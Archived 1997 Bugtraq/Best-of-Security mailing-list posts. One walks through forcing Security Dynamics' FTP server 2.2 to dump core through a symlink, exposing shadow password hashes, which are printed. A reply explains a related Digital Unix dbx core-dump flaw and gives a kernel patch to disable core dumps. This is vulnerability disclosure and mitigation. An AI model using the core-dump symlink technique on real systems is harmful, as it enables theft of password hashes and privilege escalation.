[481] in Best-of-Security
BoS: Bug In Security Dynamics' FTP server (Version 2.2)
daemon@ATHENA.MIT.EDU (sp00n)
Mon Nov 17 20:57:02 1997
X-Delivering-To: best-of-security-mtg@menelaus.mit.edu
Date: Wed, 12 Nov 1997 11:56:29 -0500
Reply-To: sp00n <sp00n@COUPLER.300BAUD.COM>
From: sp00n <sp00n@COUPLER.300BAUD.COM>
Old-X-Originally-To: To: BUGTRAQ@NETSPACE.ORG
Old-X-Originated-From: From: sp00n <sp00n@COUPLER.300BAUD.COM>
Errors-To: best-of-security-request@cyber.com.au
To: best-of-security@cyber.com.au
Resent-From: best-of-security@cyber.com.au
Hi,
This bug is similar to the solaris and other ftp core dump bugs, slightly
diffrent though. BTW the machine is a SPARC 20 running 2.5, You can link
files and clobber them with a core to annoy your local sys admin or, even
better get /etc/shadow, u get the point... anyways
220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
Name (.:joeuser): joeuser
331 Password required for mpotter.
Password:
230 User joeuser logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> user root DUMP_CORE_FTPD
331 Password required for root.
530 Login incorrect.
Login failed.
ftp> quote pasv
421 Service not available, remote server has closed connection
ftp> quit
$ ls -la core
-rw-r----- 1 root network 264656 Nov 12 11:14 core
At least it dosent dump 666 like solaris's in.ftpd :) But I cant read it
:(
Not too usefull You say? welp prior to dumping the core you should link it
to ps_data or something like that then you will get this
lrwxrwxrwx 1 joeuser network 7 Nov 12 11:07 core -> ps_data
-rw-rw-r-- 1 root sys 264656 Nov 12 11:07 ps_data
$file ps_data
ps_data: ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'
$strings core | more
noaccess:*LK*:6445::::::
sp00n:o.IZGdC5eBTtKY:10175:7:28::::
root:aiqzotPNtTsI:9988::::::
user2:U6d5srjcJi/KU:9952::::::
joeuser:ktxVoVPQVIgc.:10175:7:28::::
root::0:root
other::1:
bin::2:root,daemon
sys::3:root,bin,adm
adm::4:root,daemon
uucp::5:root
From avalon@coombs.anu.edu.au Sun Nov 16 22:19:03 1997
Received: from satay.cyber.com.au (satay.cyber.com.au [203.7.155.20]) by plum.cyber.com.au (8.6.12/8.6.6) with ESMTP id WAA02524 for <slist@cyber.com.au>; Sun, 16 Nov 1997 22:19:03 +1100
Received: (from uucp@localhost) by satay.cyber.com.au (8.7.4/8.7.3) id WAA26307 for <slist@cyber.com.au>; Sun, 16 Nov 1997 22:18:18 +1100 (EST)
Message-Id: <199711161118.WAA26307@satay.cyber.com.au>
Received: from cheops.anu.edu.au(150.203.76.24) by satay.cyber.com.au via smap (V1.3)
id sma026282; Sun Nov 16 22:17:49 1997
Received: by cheops.anu.edu.au
(1.37.109.16/16.2) id AA285879110; Sun, 16 Nov 1997 22:18:30 +1100
Date: Sun, 16 Nov 1997 22:18:30 +1100
From: Darren Reed <avalon@coombs.anu.edu.au>
Apparently-To: slist@cyber.com.au
Status: O
Approved: darrenr@cyber.com.au
X-Originally-To: To: BUGTRAQ@NETSPACE.ORG
X-Originated-From: From: sp00n <sp00n@COUPLER.300BAUD.COM>
>From owner-bugtraq@NETSPACE.ORG Sun Nov 16 08:17:12 EDT 1997 remote from cheops
Received: from brimstone.netspace.org by postbox.anu.edu.au with ESMTP
(1.37.109.16/16.2) id AA007538627; Sun, 16 Nov 1997 08:17:07 +1100
Received: from unknown@netspace.org (port 23568 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <96049-27738>; Sat, 15 Nov 1997 15:08:13 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
spool id 5661334 for BUGTRAQ@NETSPACE.ORG; Sat, 15 Nov 1997 15:07:06
-0500
Received: from brimstone.netspace.org (brimstone.netspace.org
[128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
OAA28841 for <BUGTRAQ@NETSPACE.ORG>; Sat, 15 Nov 1997 14:56:07 -0500
Received: from unknown@netspace.org (port 23568 [128.148.157.6]) by
brimstone.netspace.org with ESMTP id <80685-27736>; Sat, 15 Nov 1997
14:56:07 -0500
Approved-By: aleph1@UNDERGROUND.ORG
Received: from blubb.pdc.kth.se (blubb.pdc.kth.se [193.10.159.47]) by
netspace.org (8.8.7/8.8.2) with SMTP id VAA07409 for
<BUGTRAQ@netspace.org>; Fri, 14 Nov 1997 21:11:47 -0500
Received: from joda by blubb.pdc.kth.se with local (Exim 1.71 #1) id
0xWXhz-0001Rh-00; Sat, 15 Nov 1997 03:11:39 +0100
References: <Pine.OSF.3.91.971114122615.31640B-100000@osprey.unf.edu>
X-Emacs: 19.34
Mime-Version: 1.0 (generated by SEMI MIME-Edit 0.77)
Content-Type: text/plain; charset=US-ASCII
Lines: 35
X-Mailer: Gnus v5.4.52/Emacs 19.34
Message-Id: <xofzpn6x5wo.fsf@blubb.pdc.kth.se>
Date: Sat, 15 Nov 1997 03:11:35 +0100
Reply-To: Johan Danielsson <joda@PDC.KTH.SE>
Sender: avalon
From: Johan Danielsson <joda@PDC.KTH.SE>
Subject: Re: digital unix 4.0 hole
X-To: John McDonald <jmcdonal@OSPREY.UNF.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: John McDonald's message of Fri, 14 Nov 1997 12:37:20 -0500
John McDonald <jmcdonal@OSPREY.UNF.EDU> writes:
> If you run dbx (tested on 3.11.10) on a setuid root program that you
> have read access to, the program will core dump and create a root
> owned 600 perm core in the current directory.
The problem isn't procfs per se, but rather that it causes the program
to dump core.
What happens in that in core(), vn_open() is called just before it's
supposed to `temporarily restore real user/group ids for file
operations'. For anyone with source, the fun happens around line 4350
in kernel/bsd/kern_sig.c.
If you're *real* paranoid about this, you might be able to:
# cp /vmunix /vmunix.save
# dbx /vmunix
dbx version 3.11.10
Type 'help' for help.
main: Source not available
warning: Files compiled -g3: parameter values probably wrong
(dbx) ((unsigned*)core+82)/1 i
[core:5261, 0xfffffc000026ff48] and r1, r2, r1
(dbx) patch *((unsigned*)core+82) = 0x203f0001
[core:5261, 0xfffffc000026ff48] lda r1, 1(r31)
(dbx) q
# reboot
This might work with 4.0[ABC]; I haven't tried it though. :-) It
should completely disable all core dumps.
/Johan
